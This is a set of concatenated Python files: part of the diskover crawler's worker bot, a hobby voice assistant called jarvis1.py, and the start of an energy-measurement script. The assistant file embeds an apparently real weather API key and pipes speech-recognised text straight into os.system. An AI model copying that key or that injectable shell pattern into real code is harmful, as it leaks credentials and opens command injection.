name = name.replace('*', '')
if re.search(name, metadict['filename']):
return metadict
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
return metadict
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
return metadict
else:
if name == metadict['filename']:
return metadict
except KeyError:
pass
try:
for path in pattern['path_exclude']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
return metadict
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
return metadict
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
return metadict
else:
if path == metadict['path_parent']:
return metadict
except KeyError:
pass
try:
for name in pattern['name']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
else:
if name == metadict['filename']:
namepass = True
break
else:
namepass = False
except KeyError:
pass
try:
for path in pattern['path']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
else:
if path == metadict['path_parent']:
pathpass = True
break
else:
pathpass = False
except KeyError:
pass
timepass = auto_tag_time_check(pattern, mtime, atime, ctime)
if extpass and namepass and pathpass and timepass:
metadict['tag'] = pattern['tag']
metadict['tag_custom'] = pattern['tag_custom']
return metadict
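# Illustrative pattern shape (an assumption inferred from the key lookups in
# auto_tag() and auto_tag_time_check() above, not copied from a shipped
# diskover config): each entry in config['autotag_files'] is expected to be a
# dict roughly like the following, where * acts as a leading/trailing wildcard
# and mtime/atime/ctime are minimum ages in days.
#
#     {'name': ['*.bak', 'core.*'], 'path_exclude': ['/tmp*'],
#      'ext': ['log'], 'mtime': 30, 'atime': 0, 'ctime': 0,
#      'tag': 'archive', 'tag_custom': 'old logs'}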
def auto_tag_time_check(pattern, mtime, atime, ctime):
timepass = True
try:
if pattern['mtime'] > 0 and mtime:
# Convert time in days to seconds
time_sec = pattern['mtime'] * 86400
file_mtime_sec = time.time() - mtime
# Only tag files modified at least x days ago
if file_mtime_sec < time_sec:
timepass = False
except KeyError:
pass
try:
if pattern['atime'] > 0 and atime:
time_sec = pattern['atime'] * 86400
file_atime_sec = time.time() - atime
if file_atime_sec < time_sec:
timepass = False
except KeyError:
pass
try:
if pattern['ctime'] > 0 and ctime:
time_sec = pattern['ctime'] * 86400
file_ctime_sec = time.time() - ctime
if file_ctime_sec < time_sec:
timepass = False
except KeyError:
pass
return timepass
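# Worked example for the checks above (values assumed for illustration): with
# pattern['mtime'] == 30 the threshold is 30 * 86400 == 2592000 seconds. A file
# last modified 10 days ago gives time.time() - mtime == 864000 < 2592000, so
# timepass becomes False; a file modified 60 days ago passes, so only
# sufficiently old files are tagged.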
def get_dir_meta(worker_name, path, cliargs, reindex_dict):
"""This is the get directory meta data function.
It gets directory metadata and returns dir meta dict.
    If the directory's mtime and ctime are cached in Redis and match the
    times on disk, it returns the string "sametimes" instead.
"""
try:
lstat_path = os.lstat(path)
mtime_unix = lstat_path.st_mtime
mtime_utc = datetime.utcfromtimestamp(mtime_unix) \
.strftime('%Y-%m-%dT%H:%M:%S')
atime_unix = lstat_path.st_atime
atime_utc = datetime.utcfromtimestamp(atime_unix) \
.strftime('%Y-%m-%dT%H:%M:%S')
ctime_unix = lstat_path.st_ctime
ctime_utc = datetime.utcfromtimestamp(ctime_unix) \
.strftime('%Y-%m-%dT%H:%M:%S')
if cliargs['index2']:
# check if directory times cached in Redis
redis_dirtime = redis_conn.get(base64.encodestring(path.encode('utf-8', errors='ignore')))
if redis_dirtime:
cached_times = float(redis_dirtime.decode('utf-8'))
# check if cached times are the same as on disk
current_times = float(mtime_unix + ctime_unix)
if cached_times == current_times:
return "sametimes"
# get time now in utc
indextime_utc = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
# get user id of owner
uid = lstat_path.st_uid
# try to get owner user name
# first check cache
if uid in uids:
owner = owners[uid]
# not in cache
else:
try:
owner = pwd.getpwuid(uid).pw_name.split('\\')
# remove domain before owner
if len(owner) == 2:
owner = owner[1]
else:
owner = owner[0]
# if we can't find the owner's user name, use the uid number
except KeyError:
owner = uid
# store it in cache
if not uid in uids:
uids.append(uid)
owners[uid] = owner
# get group id
gid = lstat_path.st_gid
# try to get group name
# first check cache
if gid in gids:
group = groups[gid]
# not in cache
else:
try:
group = grp.getgrgid(gid).gr_name.split('\\')
# remove domain before group
if len(group) == 2:
group = group[1]
else:
group = group[0]
# if we can't find the group name, use the gid number
except KeyError:
group = gid
# store in cache
if not gid in gids:
gids.append(gid)
groups[gid] = group
inode = lstat_path.st_ino
hardlinks = lstat_path.st_nlink
filename = os.path.basename(path)
parentdir = os.path.abspath(os.path.join(path, os.pardir))
fullpath = os.path.abspath(os.path.join(parentdir, filename))
dirmeta_dict = {
"filename": filename,
"path_parent": parentdir,
"filesize": 0,
"items": 1, # 1 for itself
"items_files": 0,
"items_subdirs": 0,
"last_modified": mtime_utc,
"last_access": atime_utc,
"last_change": ctime_utc,
"hardlinks": hardlinks,
"inode": inode,
"owner": owner,
"group": group,
"tag": "",
"tag_custom": "",
"indexing_date": indextime_utc,
"worker_name": worker_name,
"change_percent_filesize": "",
"change_percent_items": "",
"change_percent_items_files": "",
"change_percent_items_subdirs": "",
"_type": "directory"
}
# check plugins for adding extra meta data to dirmeta_dict
for plugin in diskover.plugins:
try:
# check if plugin is for directory doc
mappings = {'mappings': {'directory': {'properties': {}}}}
plugin.add_mappings(mappings)
dirmeta_dict.update(plugin.add_meta(fullpath))
except KeyError:
pass
# add any autotags to dirmeta_dict
if cliargs['autotag'] and len(diskover.config['autotag_dirs']) > 0:
auto_tag(dirmeta_dict, 'directory', mtime_unix, atime_unix, ctime_unix)
# search for and copy over any existing tags from reindex_dict
for sublist in reindex_dict['directory']:
if sublist[0] == fullpath:
dirmeta_dict['tag'] = sublist[1]
dirmeta_dict['tag_custom'] = sublist[2]
break
except (IOError, OSError):
return None
# cache directory times in Redis, encode path (key) using base64
if diskover.config['redis_cachedirtimes'] == 'True' or diskover.config['redis_cachedirtimes'] == 'true':
redis_conn.set(base64.encodestring(path.encode('utf-8', errors='ignore')), mtime_unix + ctime_unix,
ex=diskover.config['redis_dirtimesttl'])
return dirmeta_dict
def get_file_meta(worker_name, path, cliargs, reindex_dict):
"""This is the get file meta data function.
    It scrapes file meta data and skips files smaller than
    minsize bytes, files modified more recently than the mtime
    threshold, and files in excluded_files. Returns a file meta dict.
"""
try:
filename = os.path.basename(path)
        # check if file is in excluded_files list
extension = os.path.splitext(filename)[1][1:].strip().lower()
if file_excluded(filename, extension, path, cliargs['verbose']):
return None
# use lstat to get meta and not follow sym links
stat = os.lstat(path)
# get file size (bytes)
size = stat.st_size
# Skip files smaller than minsize cli flag
if size < cliargs['minsize']:
return None
# check file modified time
mtime_unix = stat.st_mtime
mtime_utc = \
datetime.utcfromtimestamp(mtime_unix).strftime('%Y-%m-%dT%H:%M:%S')
# Convert time in days (mtime cli arg) to seconds
time_sec = cliargs['mtime'] * 86400
file_mtime_sec = time.time() - mtime_unix
# Only process files modified at least x days ago
if file_mtime_sec < time_sec:
return None
# get access time
atime_unix = stat.st_atime
atime_utc = \
datetime.utcfromtimestamp(atime_unix).strftime('%Y-%m-%dT%H:%M:%S')
# get change time
ctime_unix = stat.st_ctime
ctime_utc = \
datetime.utcfromtimestamp(ctime_unix).strftime('%Y-%m-%dT%H:%M:%S')
# get user id of owner
uid = stat.st_uid
# try to get owner user name
# first check cache
if uid in uids:
owner = owners[uid]
# not in cache
else:
try:
owner = pwd.getpwuid(uid).pw_name.split('\\')
# remove domain before owner
if len(owner) == 2:
owner = owner[1]
else:
owner = owner[0]
# if we can't find the owner's user name, use the uid number
except KeyError:
owner = uid
# store it in cache
if not uid in uids:
uids.append(uid)
owners[uid] = owner
# get group id
gid = stat.st_gid
# try to get group name
# first check cache
if gid in gids:
group = groups[gid]
# not in cache
else:
try:
group = grp.getgrgid(gid).gr_name.split('\\')
# remove domain before group
if len(group) == 2:
group = group[1]
else:
group = group[0]
# if we can't find the group name, use the gid number
except KeyError:
group = gid
# store in cache
if not gid in gids:
gids.append(gid)
groups[gid] = group
# get inode number
inode = stat.st_ino
# get number of hardlinks
hardlinks = stat.st_nlink
# create md5 hash of file using metadata filesize and mtime
filestring = str(size) + str(mtime_unix)
filehash = hashlib.md5(filestring.encode('utf-8')).hexdigest()
# get time
indextime_utc = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
# get absolute path of parent directory
parentdir = os.path.abspath(os.path.join(path, os.pardir))
# create file metadata dictionary
filemeta_dict = {
"filename": filename,
"extension": extension,
"path_parent": parentdir,
"filesize": size,
"owner": owner,
"group": group,
"last_modified": mtime_utc,
"last_access": atime_utc,
"last_change": ctime_utc,
"hardlinks": hardlinks,
"inode": inode,
"filehash": filehash,
"tag": "",
"tag_custom": "",
"dupe_md5": "",
"indexing_date": indextime_utc,
"worker_name": worker_name,
"_type": "file"
}
# check plugins for adding extra meta data to filemeta_dict
for plugin in diskover.plugins:
try:
# check if plugin is for file doc
mappings = {'mappings': {'file': {'properties': {}}}}
plugin.add_mappings(mappings)
filemeta_dict.update(plugin.add_meta(path))
except KeyError:
pass
# add any autotags to filemeta_dict
if cliargs['autotag'] and len(diskover.config['autotag_files']) > 0:
auto_tag(filemeta_dict, 'file', mtime_unix, atime_unix, ctime_unix)
# search for and copy over any existing tags from reindex_dict
for sublist in reindex_dict['file']:
if sublist[0] == path:
filemeta_dict['tag'] = sublist[1]
filemeta_dict['tag_custom'] = sublist[2]
break
except (IOError, OSError):
return None
return filemeta_dict
def calc_dir_size(dirlist, cliargs):
"""This is the calculate directory size worker function.
It gets a directory list from the Queue and searches ES for all files
in each directory (recursive) and sums their filesizes
to create a total filesize and item count for each dir.
Updates dir doc's filesize and items fields.
"""
jobstart = time.time()
bot_logger.info('*** Calculating directory sizes...')
doclist = []
for path in dirlist:
totalsize = 0
totalitems = 1 # 1 for itself
totalitems_files = 0
totalitems_subdirs = 0
        # file doc search with an aggregation to sum filesizes
# escape special characters
newpath = diskover.escape_chars(path[1])
# create wildcard string and check for / (root) path
if newpath == '\/':
newpathwildcard = '\/*'
else:
newpathwildcard = newpath + '\/*'
# check if / (root) path
if newpath == '\/':
data = {
"size": 0,
"query": {
"query_string": {
"query": "path_parent: " + newpath + "*",
"analyze_wildcard": "true"
}
},
"aggs": {
"total_size": {
"sum": {
"field": "filesize"
}
}
}
}
else:
data = {
"size": 0,
"query": {
"query_string": {
'query': 'path_parent: ' + newpath + ' OR path_parent: ' + newpathwildcard,
'analyze_wildcard': 'true'
}
},
"aggs": {
"total_size": {
"sum": {
"field": "filesize"
}
}
}
}
# search ES and start scroll
res = es.search(index=cliargs['index'], doc_type='file', body=data,
request_timeout=diskover.config['es_timeout'])
# total items sum
totalitems_files += res['hits']['total']
# total file size sum
totalsize += res['aggregations']['total_size']['value']
# directory doc search (subdirs)
# search ES and start scroll
res = es.search(index=cliargs['index'], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
# total items sum
totalitems_subdirs += res['hits']['total']
# total items
totalitems += totalitems_files + totalitems_subdirs
# update filesize and items fields for directory (path) doc
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': 'directory',
'_id': path[0],
'doc': {'filesize': totalsize, 'items': totalitems,
'items_files': totalitems_files,
'items_subdirs': totalitems_subdirs}
}
doclist.append(d)
diskover.index_bulk_add(es, doclist, diskover.config, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED CALC DIR, Elapsed Time: ' + str(elapsed_time))
def es_bulk_adder(worker_name, docs, cliargs, totalcrawltime=None):
starttime = time.time()
if not cliargs['s3']:
bot_logger.info('*** Bulk adding to ES index...')
try:
dirlist, filelist, crawltimelist = docs
diskover.index_bulk_add(es, dirlist, diskover.config, cliargs)
diskover.index_bulk_add(es, filelist, diskover.config, cliargs)
if not cliargs['reindex'] and not cliargs['reindexrecurs'] and not cliargs['crawlbot']:
diskover.index_bulk_add(es, crawltimelist, diskover.config, cliargs)
except ValueError:
diskover.index_bulk_add(es, docs, diskover.config, cliargs)
if not cliargs['reindex'] and not cliargs['reindexrecurs'] and not cliargs['crawlbot']:
data = {"worker_name": worker_name, "dir_count": len(dirlist),
"file_count": len(filelist), "bulk_time": round(time.time() - starttime, 10),
"crawl_time": round(totalcrawltime, 10),
"indexing_date": datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")}
es.index(index=cliargs['index'], doc_type='worker', body=data)
if not cliargs['s3']:
elapsed_time = round(time.time() - starttime, 3)
bot_logger.info('*** FINISHED BULK ADDING, Elapsed Time: ' + str(elapsed_time))
def get_metadata(path, cliargs):
dir_source = ""
filename = diskover.escape_chars(os.path.basename(path))
parent_dir = diskover.escape_chars(os.path.abspath(os.path.join(path, os.pardir)))
fullpath = diskover.escape_chars(os.path.abspath(path))
data = {
"size": 1,
"query": {
"query_string": {
"query": "filename: " + filename + " AND path_parent: " + parent_dir
}
}
}
res = es.search(index=cliargs['index2'], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
try:
dir_source = res['hits']['hits'][0]['_source']
except IndexError:
pass
data = {
"query": {
"query_string": {
"query": "path_parent: " + fullpath
}
}
}
files_source = []
res = es.search(index=cliargs['index2'], doc_type='file', scroll='1m',
size=1000, body=data, request_timeout=diskover.config['es_timeout'])
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
files_source.append(hit['_source'])
# get es scroll id
scroll_id = res['_scroll_id']
# use es scroll api
res = es.scroll(scroll_id=scroll_id, scroll='1m',
request_timeout=diskover.config['es_timeout'])
return dir_source, files_source
def file_scraper(file_in_thread_q, file_out_thread_q):
while True:
item = file_in_thread_q.get()
worker, path, cliargs, reindex_dict = item
if cliargs['qumulo']:
import diskover_qumulo
fmeta = diskover_qumulo.qumulo_get_file_meta(worker, path, cliargs, reindex_dict)
else:
fmeta = get_file_meta(worker, path, cliargs, reindex_dict)
if fmeta:
file_out_thread_q.put(fmeta)
file_in_thread_q.task_done()
def start_file_threads(file_in_thread_q, file_out_thread_q, threads=4):
for i in range(threads):
thread = Thread(target=file_scraper, args=(file_in_thread_q, file_out_thread_q,))
thread.daemon = True
thread.start()
def scrape_tree_meta(paths, cliargs, reindex_dict):
jobstart = time.time()
worker = get_worker_name()
tree_dirs = []
tree_files = []
tree_crawltimes = []
qumulo = cliargs['qumulo']
totalcrawltime = 0
# amount of time (sec) before starting threads to help crawl files
filethreadtime = diskover.config['filethreadtime']
for path in paths:
threadsstarted = False
starttime = time.time()
root, files = path
if qumulo:
import diskover_qumulo
if root['path'] != '/':
root_path = root['path'].rstrip(os.path.sep)
else:
root_path = root['path']
dmeta = diskover_qumulo.qumulo_get_dir_meta(worker, root, cliargs, reindex_dict, redis_conn)
else:
root_path = root
dmeta = get_dir_meta(worker, root, cliargs, reindex_dict)
if dmeta == "sametimes":
            # fetch meta data for the directory and all its files (doc sources) from index2 since
            # the directory times haven't changed
dir_source, files_source = get_metadata(root_path, cliargs)
datenow = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
for file_source in files_source:
# update indexed at time
file_source['indexing_date'] = datenow
# update worker name
file_source['worker_name'] = worker
tree_files.append(('file', file_source))
if dir_source:
# update indexed at time
dir_source['indexing_date'] = datenow
# update worker name
dir_source['worker_name'] = worker
tree_dirs.append(dir_source)
elapsed = time.time() - starttime
tree_crawltimes.append({
"path": root_path,
"worker_name": worker,
"crawl_time": round(elapsed, 10),
"indexing_date": datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f"),
"_type": "crawlstat"})
totalcrawltime += elapsed
else: # get meta off disk since times different in Redis than on disk
for file in files:
# spawn threads to help with getting file meta if running long
if (time.time() - starttime) > filethreadtime:
if not threadsstarted:
                        bot_logger.info('*** %s taking more than %s seconds to crawl, starting threads to help scrape file meta'
                                        % (root, filethreadtime))
# set up python Queue for threaded file meta scraping
file_in_thread_q = pyQueue()
file_out_thread_q = pyQueue()
start_file_threads(file_in_thread_q, file_out_thread_q)
threadsstarted = True
if qumulo:
file_in_thread_q.put((worker, file, cliargs, reindex_dict))
else:
file_in_thread_q.put((worker, os.path.join(root, file), cliargs, reindex_dict))
else:
if qumulo:
fmeta = diskover_qumulo.qumulo_get_file_meta(worker, file, cliargs, reindex_dict)
else:
fmeta = get_file_meta(worker, os.path.join(root, file), cliargs, reindex_dict)
if fmeta:
tree_files.append(fmeta)
if threadsstarted:
bot_logger.info('*** Waiting for threads to finish...')
# wait for threads to finish
file_in_thread_q.join()
bot_logger.info('*** Adding file meta thread results for %s' % root)
# get all files and add to tree_files
while file_out_thread_q.qsize():
tree_files.append(file_out_thread_q.get())
if dmeta:
tree_dirs.append(dmeta)
elapsed = time.time() - starttime
tree_crawltimes.append({
"path": root_path,
"worker_name": worker,
"crawl_time": round(elapsed, 10),
"indexing_date": datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f"),
"_type": "crawlstat"})
totalcrawltime += elapsed
if len(tree_dirs) > 0 or len(tree_files) > 0:
es_bulk_adder(worker, (tree_dirs, tree_files, tree_crawltimes), cliargs, totalcrawltime)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
def file_excluded(filename, extension, path, verbose):
"""Return True if path or ext in excluded_files set,
False if not in the set"""
# return if filename in included list (whitelist)
if filename in diskover.config['included_files']:
return False
# check for extension in and . (dot) files in excluded_files
if (not extension and 'NULLEXT' in diskover.config['excluded_files']) or \
'*.' + extension in diskover.config['excluded_files'] or \
(filename.startswith('.') and u'.*' in diskover.config['excluded_files']):
if verbose:
bot_logger.info('Skipping (excluded file) %s', path)
return True
# check for filename in excluded_files set
if filename in diskover.config['excluded_files']:
if verbose:
bot_logger.info('Skipping (excluded file) %s', path)
return True
return False
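# A minimal, self-contained sketch of the exclusion rules implemented above,
# using a hypothetical config rather than diskover.config. Illustrative only;
# the real function also logs skips when verbose is set.
def _file_excluded_sketch(filename, extension, excluded_files, included_files=()):
    if filename in included_files:          # whitelist always wins
        return False
    if not extension and 'NULLEXT' in excluded_files:   # files with no extension
        return True
    if '*.' + extension in excluded_files:  # wildcard extension match, e.g. *.tmp
        return True
    if filename.startswith('.') and u'.*' in excluded_files:  # dot files
        return True
    return filename in excluded_files       # exact filename match
# Example: _file_excluded_sketch('.DS_Store', '', {'.*', '*.tmp'}) -> True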
def dupes_process_hashkey(hashkey, cliargs):
"""This is the duplicate file worker function.
It processes hash keys in the dupes Queue.
"""
import diskover_dupes
bot_logger.info('*** Processing Hash Key: ' + hashkey)
jobstart = time.time()
# find all files in ES matching hashkey
hashgroup = diskover_dupes.populate_hashgroup(hashkey, cliargs)
# process the duplicate files in hashgroup
hashgroup = diskover_dupes.verify_dupes(hashgroup, cliargs)
if hashgroup:
diskover_dupes.index_dupes(hashgroup, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
def tag_copier(path, cliargs):
"""This is the tag copier worker function.
It gets a path from the Queue and searches index for the
same path and copies any existing tags (from index2)
Updates index's doc's tag and tag_custom fields.
"""
jobstart = time.time()
doclist = []
# doc search (matching path) in index for existing tags from index2
# filename
f = os.path.basename(path[0])
# parent path
p = os.path.abspath(os.path.join(path[0], os.pardir))
data = {
"size": 1,
"_source": ['tag', 'tag_custom'],
"query": {
"query_string": {
"query": "filename: \"" + f + "\" AND path_parent: \"" + p + "\""
}
}
}
# check if file or directory
if path[3] == 'directory':
# search ES
res = es.search(index=cliargs['index'], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
else:
res = es.search(index=cliargs['index'], doc_type='file', body=data,
request_timeout=diskover.config['es_timeout'])
# mark task done if no matching path in index and continue
if len(res['hits']['hits']) == 0:
bot_logger.info('*** No matching path found in index')
return True
# existing tag in index2
docid = res['hits']['hits'][0]['_id']
# update tag and tag_custom fields in index
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': path[3],
'_id': docid,
'doc': {'tag': path[1], 'tag_custom': path[2]}
}
    doclist.append(d)
diskover.index_bulk_add(es, doclist, diskover.config, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
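# The update actions built above follow the elasticsearch-py bulk helper
# format. A minimal sketch of how such a doclist could be flushed, assuming
# diskover.index_bulk_add wraps something equivalent to helpers.bulk:
def _bulk_update_sketch(es_client, doclist, chunk_size=500):
    from elasticsearch import helpers  # local import to keep the sketch self-contained
    # helpers.bulk streams the actions in chunks and returns (success count, errors)
    success_count, errors = helpers.bulk(es_client, doclist,
                                         chunk_size=chunk_size,
                                         raise_on_error=False)
    return success_count, errors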
def calc_hot_dirs(dirlist, cliargs):
"""This is the calculate hotdirs worker function.
It gets a directory list from the Queue, iterates over the path list
and searches index2 for the same path and calculates change percent
between the two. If path not in index2, change percent is 100%.
Updates index's directory doc's change_percent fields.
"""
jobstart = time.time()
doclist = []
bot_logger.info('*** Calculating directory change percents...')
dir_id_list = []
for path in dirlist:
# doc search (matching path) in index2
# filename
f = os.path.basename(path[1])
# parent path
p = os.path.abspath(os.path.join(path[1], os.pardir))
data = {
"size": 1,
"_source": ['filesize', 'items', 'items_files', 'items_subdirs'],
"query": {
"query_string": {
"query": "filename: \"" + f + "\" AND path_parent: \"" + p + "\""
}
}
}
# search ES
res = es.search(index=cliargs['hotdirs'][0], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
# calculate change percent
# set change percent to 100% if no matching path in index2
if len(res['hits']['hits']) == 0:
changepercent_filesize = 100.0
changepercent_items = 100.0
changepercent_items_files = 100.0
changepercent_items_subdirs = 100.0
else:
source = res['hits']['hits'][0]['_source']
# ((new - old) / old) * 100
try:
# check if path size in index2 was 0 bytes and set change percent to 100%
if path[2] > 0 and source['filesize'] == 0:
changepercent_filesize = 100.0
else:
changepercent_filesize = round(((path[2] - source['filesize'])
/ source['filesize']) * 100.0, 2)
except ZeroDivisionError:
changepercent_filesize = 0.0
try:
# check if path items in index2 was 0 and set change percent to 100%
if path[3] > 0 and source['items'] == 0:
changepercent_items = 100.0
else:
changepercent_items = round(((path[3] - source['items'])
/ source['items']) * 100.0, 2)
except ZeroDivisionError:
changepercent_items = 0.0
try:
# check if path file items in index2 was 0 and set change percent to 100%
if path[4] > 0 and source['items_files'] == 0:
changepercent_items_files = 100.0
else:
changepercent_items_files = round(((path[4] - source['items_files'])
/ source['items_files']) * 100.0, 2)
except ZeroDivisionError:
changepercent_items_files = 0.0
try:
# check if path subdir items in index2 was 0 and set change percent to 100%
if path[5] > 0 and source['items_subdirs'] == 0:
changepercent_items_subdirs = 100.0
else:
changepercent_items_subdirs = round(((path[5] - source['items_subdirs'])
/ source['items_subdirs']) * 100.0, 2)
except ZeroDivisionError:
changepercent_items_subdirs = 0.0
# update fields in index
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': 'directory',
'_id': path[0],
'doc': {'change_percent_filesize': changepercent_filesize,
'change_percent_items': changepercent_items,
'change_percent_items_files': changepercent_items_files,
'change_percent_items_subdirs': changepercent_items_subdirs}
}
doclist.append(d)
diskover.index_bulk_add(es, doclist, diskover.config, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
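# A minimal sketch of the change-percent rule used above: ((new - old) / old) * 100,
# with 100% when the old value was 0 but the new value is not, and 0% when both
# are 0. Names are illustrative only.
def _change_percent_sketch(new, old):
    if old == 0:
        return 100.0 if new > 0 else 0.0
    return round(((new - old) / old) * 100.0, 2)
# Example: _change_percent_sketch(150, 100) -> 50.0, _change_percent_sketch(5, 0) -> 100.0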
# set up bot logging
bot_logger = bot_log_setup()
if __name__ == '__main__':
# parse cli arguments into cliargs dictionary
cliargs_bot = vars(parse_cli_args())
# Redis queue names
if cliargs_bot['queue'] is None:
listen = ['diskover', 'diskover_crawl', 'diskover_calcdir']
else:
listen = cliargs_bot['queue']
print("""\033[31m
___ _ ____ _ _ ____ _ _ ____ ____ ;
|__> | ==== |-:_ [__] \/ |=== |--< ["]
____ ____ ____ _ _ _ ___ ____ ___ /[_]\\
|___ |--< |--| |/\| |___ |==] [__] | ] [ v%s
Redis RQ worker bot for diskover crawler
Crawling all your stuff.
\033[0m""" % (diskover.version))
with Connection(redis_conn):
w = Worker(listen)
if cliargs_bot['burst']:
w.work(burst=True)
else:
w.work()
|
jarvis1.py
|
import speech_recognition as sr
from time import ctime
import time
import threading
import cv2
import sys
import logging as log
import datetime as dt
import os
import pyjokes
import wikipedia
import requests
from pygame import mixer
from gtts import gTTS
mixer.init()
os.system("jack_control start")
os.system("arecord -l")
def speak(audioString):
print(audioString)
tts = gTTS(text=audioString, lang='en')
tts.save("audio.mp3")
print("SAVED")
#os.system("mpg321 audio.mp3")
mixer.music.load('audio.mp3')
mixer.music.play()
def recordAudio():
# Record Audio
r = sr.Recognizer()
with sr.Microphone() as source:
print(sr.Microphone())
print(sr.Recognizer())
print("Say something!")
audio = r.listen(source)
print("Heard")
# Speech recognition using Google Speech Recognition
data = ""
try:
# Uses the default API key
# To use another API key: `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")`
data = r.recognize_google(audio)
print("You said: " + data)
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
return data
def weather():
def weather_data(query):
res=requests.get('http://api.openweathermap.org/data/2.5/weather?'+query+'&APPID=8de0c1d186a15c6c44a58c73ca31e976&units=metric');
return res.json();
def print_weather(result,city):
w1 = ("{}'s temperature: {}°C ".format(city,result['main']['temp']))
w2 = ("Wind speed: {} meters per second".format(result['wind']['speed']))
w3 = ("Weather description: {}".format(result['weather'][0]['description']))
w = w1 + w2 + w3
print("{}'s temperature: {}°C ".format(city,result['main']['temp']))
print("Wind speed: {} m/s".format(result['wind']['speed']))
print("Description: {}".format(result['weather'][0]['description']))
print("Weather: {}".format(result['weather'][0]['main']))
speak(w)
def main():
city="Toronto"
print()
try:
query='q='+city;
w_data=weather_data(query);
print_weather(w_data, city)
print()
except:
print('City name not found...')
    # call the nested helper directly so weather() also works when imported
    main()
def jarvis(data):
if "tell me a joke" in data:
joke = pyjokes.get_joke()
speak(joke)
if "tell me the weather" in data:
weather()
if "how are you" in data:
speak("I am fine")
if "what time is it" in data:
speak(ctime())
if "where is" in data:
data = data.split(" ")
location = data[2]
speak("Hold on Mr.Tahbahtah, I will show you where " + location + " is.")
os.system("start https://www.google.nl/maps/place/" + location + "/&")
if "look up" in data:
try:
data = data.split(" ")
query = data[2]
speak("Hold on Mr.Tahbahtah, I'll look up " + query)
wiki_res = wikipedia.summary(query, sentences=2)
speak(wiki_res)
except wikipedia.exceptions.PageError:
print("An error occured, coudn't find anything on: " + query)
speak("An error occured, coudn't find anything on: " + query)
except requests.exceptions.ConnectionError:
print("A connection error occured, coudn't find anything on: " + query)
speak("A connection error occured, coudn't find anything on: " + query)
def EdithEyes():
import real_time_object_detection
# cascPath = "haarcascade_frontalface_default.xml"
# faceCascade = cv2.CascadeClassifier(cascPath)
# log.basicConfig(filename='webcam.log',level=log.INFO)
# video_capture = cv2.VideoCapture(0)
# anterior = 0
# while True:
# if not video_capture.isOpened():
# print('Unable to load camera.')
# time.sleep(5)
# pass
# # Capture frame-by-frame
# ret, frame = video_capture.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# faces = faceCascade.detectMultiScale(
# gray,
# scaleFactor=1.1,
# minNeighbors=5,
# minSize=(30, 30)
# )
# # Draw a rectangle around the faces
# for (x, y, w, h) in faces:
# cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
# if anterior != len(faces):
# anterior = len(faces)
# if len(faces) == 0:
# log.info("faces: 0"+" at "+str(dt.datetime.now()))
# else:
# #print ("faces: "+str(len(faces))+" at "+str(dt.datetime.now()))
# log.info("faces: "+str(len(faces))+" at "+str(dt.datetime.now()))
# # Display the resulting frame
# cv2.imshow('Video', frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# # Display the resulting frame
# cv2.imshow('Video', frame)
# # When everything is done, release the capture
# video_capture.release()
# cv2.destroyAllWindows()
E = threading.Thread(target=EdithEyes)
E.start()
# initialization
time.sleep(2)
speak("Hello Mr.Tahbahtah, what can I do for you?")
while 1:
data = recordAudio()
jarvis(data)
|
evaluate.py
|
import time
import statistics
from timeit import default_timer as timer
from multiprocessing import Process, Queue
import os
import datetime
import subprocess
import queue
import csv
import sys
from energyusage.RAPLFile import RAPLFile
sys.path.append('/root/energy_usage/energy-usage-master/energyusage')
import energyusage.utils as utils
import energyusage.convert as convert
import energyusage.locate as locate
import energyusage.report as report
import graph
DELAY = .1 # in seconds
def func(user_func, q, *args):
""" Runs the user's function and puts return value in queue """
value = user_func(*args)
q.put(value)
def energy(user_func, *args, powerLoss = 0.8, year, printToScreen, timeseries):
""" Evaluates the kwh needed for your code to run
Parameters:
user_func (function): user's function
Returns:
(process_kwh, return_value, watt_averages)
"""
